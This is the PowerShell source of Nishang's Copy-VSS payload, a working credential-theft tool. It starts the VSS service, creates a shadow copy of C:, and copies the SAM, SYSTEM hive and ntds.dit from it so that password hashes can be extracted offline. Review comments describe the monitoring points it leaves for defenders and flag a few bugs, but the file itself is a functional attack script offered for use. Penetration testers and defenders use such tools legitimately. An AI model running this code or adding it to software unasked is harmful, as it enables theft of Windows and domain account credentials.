function Copy-VSS
{
<#
.SYNOPSIS
Nishang Payload which copies the SAM file (and ntds.dit and SYSTEM hive if run on a Domain Controller).
.DESCRIPTION
This payload uses the VSS service (starts it if not running), creates a shadow of C:
and copies the SAM file which could be used to dump password hashes from it. If the script is run on a Domain Controller, ntds.dit and SYSTEM hive are also copied.
The script must be run from an elevated shell.
The default path used for SAM is C:\Windows\System32\config\SAM, for SYSTEM hive it is C:\Windows\System32\config\SYSTEM and for
NTDS.dit it is C:\Windows\system32\ntds.dit. Sometimes the ntds.dit is present in other locations like D:\NTDS or C:\Windows\NTDS and so on.
Use $ntdsSource variable to provide the directory.
.PARAMETER PATH
The path where the files would be saved. It must already exist.
.EXAMPLE
PS > Copy-VSS
Saves the files in current run location of the payload.
.Example
PS > Copy-VSS -DestinationDir C:\temp
Saves the files in C:\temp.
.Example
PS > Copy-VSS -DestinationDir C:\temp -ntdsSource D:\ntds\ntds.dit
.LINK
http://www.canhazcode.com/index.php?a=4
https://github.com/samratashok/nishang
.NOTES
Code by @al14s
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$DestinationDir,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$ntdsSource
)
# Observable side effects of this function, in order: a VSS service start (only
# if it was not already running), a Win32_ShadowCopy.Create call over WMI, up to
# three cmd.exe child processes of PowerShell doing file copies, a shadow copy
# deletion and possibly a VSS service stop. Each is a point a defender can
# monitor; the function itself does no logging.
$service = (Get-Service -name VSS)
if($service.Status -ne "Running")
{
# Remembered so the service is stopped again at the end only if this run
# started it. NOTE(review): $notrunning is never initialised to 0; PowerShell
# resolves an unassigned name from enclosing scopes, so if a caller's scope
# already defines $notrunning the final Stop() could run even though the
# service was running beforehand -- confirm.
$notrunning=1
$service.Start()
}
# The shadow is always taken of C:\ regardless of where $ntdsSource points.
# ShadowID is kept so the matching Win32_ShadowCopy instance can be fetched.
$id = (Get-WmiObject -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume = (Get-WmiObject win32_shadowcopy -filter "ID='$id'")
# Output files default to the caller's current location ($pwd) ...
$SAMpath = "$pwd\SAM"
$SYSTEMpath = "$pwd\SYSTEM"
$ntdspath = "$pwd\ntds"
# ... and are redirected when -DestinationDir is given. The directory is not
# created or validated here; the help above requires that it already exist.
if ($DestinationDir)
{
$SAMpath = "$DestinationDir\SAM"
$SYSTEMpath = "$DestinationDir\SYSTEM"
$ntdspath = "$DestinationDir\ntds"
}
# Copies are done by cmd.exe reading from the shadow's DeviceObject path. The
# destination variables are not quoted on the cmd command line, so a
# destination containing spaces would be split by cmd (presumed; not fixed here).
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath
if($ntdsSource)
{
# $ntdsSource is treated as a directory relative to the shadow root and
# "\ntds.dit" is appended. NOTE(review): this disagrees with the .Example
# above, which passes a full file path (D:\ntds\ntds.dit); since the shadow is
# of C:\ only, a path on another volume would not be present in it either.
cmd /c copy "$($volume.DeviceObject)\$ntdsSource\ntds.dit" $ntdspath
}
else
{
cmd /c copy "$($volume.DeviceObject)\windows\system32\ntds.dit" $ntdspath
}
# Remove the shadow copy created above. Its creation and deletion both happen
# within this single invocation.
$volume.Delete()
# Restore the service to its prior state only when this run started it.
if($notrunning -eq 1)
{
$service.Stop()
}
}